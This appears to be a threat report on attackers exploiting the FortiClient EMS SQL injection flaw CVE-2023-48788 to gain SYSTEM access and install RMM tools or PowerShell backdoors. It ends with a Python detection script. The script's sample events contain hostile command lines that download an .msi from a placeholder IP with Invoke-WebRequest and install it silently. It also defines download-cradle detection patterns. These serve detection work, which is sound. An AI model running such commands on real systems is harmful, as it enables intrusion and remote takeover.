Malicious actors are exploiting a critical vulnerability in the Fortinet FortiClient EMS application to deploy unauthorized Remote Monitoring and Management (RMM) tools and PowerShell backdoors on the target systems.
Tracked as CVE-2023-48788, the flaw is an SQL injection issue that allows a remote non-authenticated attacker to execute arbitrary SQL commands within the application database by sending a specially crafted request.
The attack begins with external IP addresses establishing connections to the FCM daemon process, which operates within the FortiClient EMS application and listens on port 8013 for incoming requests.
Exploiting an unpatched FortiClient EMS application, adversaries can perform SQL injection through specially crafted messages and execute arbitrary commands via cmd.exe by enabling xp_cmdshell.
Upon exploitation and remote code execution, the sqlservr.exe process running from the \MSSQL14.FCEMS\ directory spawns a cmd.exe instance, which lets adversaries execute commands or run other binaries with SYSTEM-level permissions.
From that foothold, attackers download malicious Windows Installer files (.msi) from known malicious IP addresses using PowerShell's Invoke-WebRequest cmdlet. The .msi files observed were RMM tools such as Atera or ScreenConnect, providing adversaries with remote access to and control over compromised devices.
In some instances, however, adversaries failed to install the RMM tools. In those cases they fell back to deploying PowerShell backdoors, notably Metasploit's powerfun.ps1 script.
Red Canary's observations indicate that the threat actor took between 36 seconds and 47 minutes from initial access to the attempt to install an RMM tool or backdoor.
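The process chain described above (the FCEMS sqlservr.exe instance spawning cmd.exe, then PowerShell download cradles and msiexec beneath it) is a usable detection anchor. The following triage script is an added example, not code from the original write-up or from Red Canary; it runs over constructed process-creation records whose field names follow Sysmon Event ID 1 (ProcessId, ParentProcessId, ParentImage, Image, CommandLine), and the IP address and file names in the sample are placeholders.

```python
import re

# Constructed sample process-creation records (not real telemetry); 198.51.100.7 is a TEST-NET placeholder.
EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Binn\sqlservr.exe",
     "cmdline": r'cmd.exe /c powershell -c "Invoke-WebRequest http://198.51.100.7/a.msi -OutFile C:\Windows\Temp\a.msi"'},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell -c "Invoke-WebRequest http://198.51.100.7/a.msi -OutFile C:\Windows\Temp\a.msi"'},
    {"pid": 4150, "ppid": 4100, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": r"msiexec /i C:\Windows\Temp\a.msi /qn"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},  # benign: unrelated parent
]

# sqlservr.exe running from the FortiClient EMS SQL instance directory named in the write-up.
FCEMS_SQLSERVR = re.compile(r"\\MSSQL14\.FCEMS\\.*\\sqlservr\.exe$", re.IGNORECASE)
# Invoke-WebRequest (and its alias) as seen in the chain, plus other common PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def xp_cmdshell_spawns(events):
    """cmd.exe whose parent is the FCEMS sqlservr.exe: the xp_cmdshell pattern from the write-up."""
    return [e for e in events
            if basename(e["image"]) == "cmd.exe" and FCEMS_SQLSERVR.search(e["parent_image"])]

def descendants(events, root_pid):
    """Every process below root_pid in the tree, walked via ParentProcessId."""
    found, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        for e in events:
            if e["ppid"] == pid:
                found.append(e)
                stack.append(e["pid"])
    return found

def triage(events):
    """Return (pid, finding) pairs for the SQLi -> xp_cmdshell -> download -> MSI install chain."""
    findings = []
    for cmd in xp_cmdshell_spawns(events):
        findings.append((cmd["pid"], "cmd.exe spawned by FCEMS sqlservr.exe (xp_cmdshell)"))
        for d in descendants(events, cmd["pid"]):
            name = basename(d["image"])
            if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE.search(d["cmdline"]):
                findings.append((d["pid"], "PowerShell download cradle under SQL Server process tree"))
            elif name == "msiexec.exe":
                findings.append((d["pid"], "MSI install under SQL Server process tree (possible RMM deployment)"))
    return findings
```

Against the sample, `triage(EVENTS)` flags the cmd.exe, the PowerShell download and the msiexec run, and ignores the cmd.exe launched from explorer.exe; on real hosts, any cmd.exe child of the FCEMS sqlservr.exe deserves a look even without the later stages.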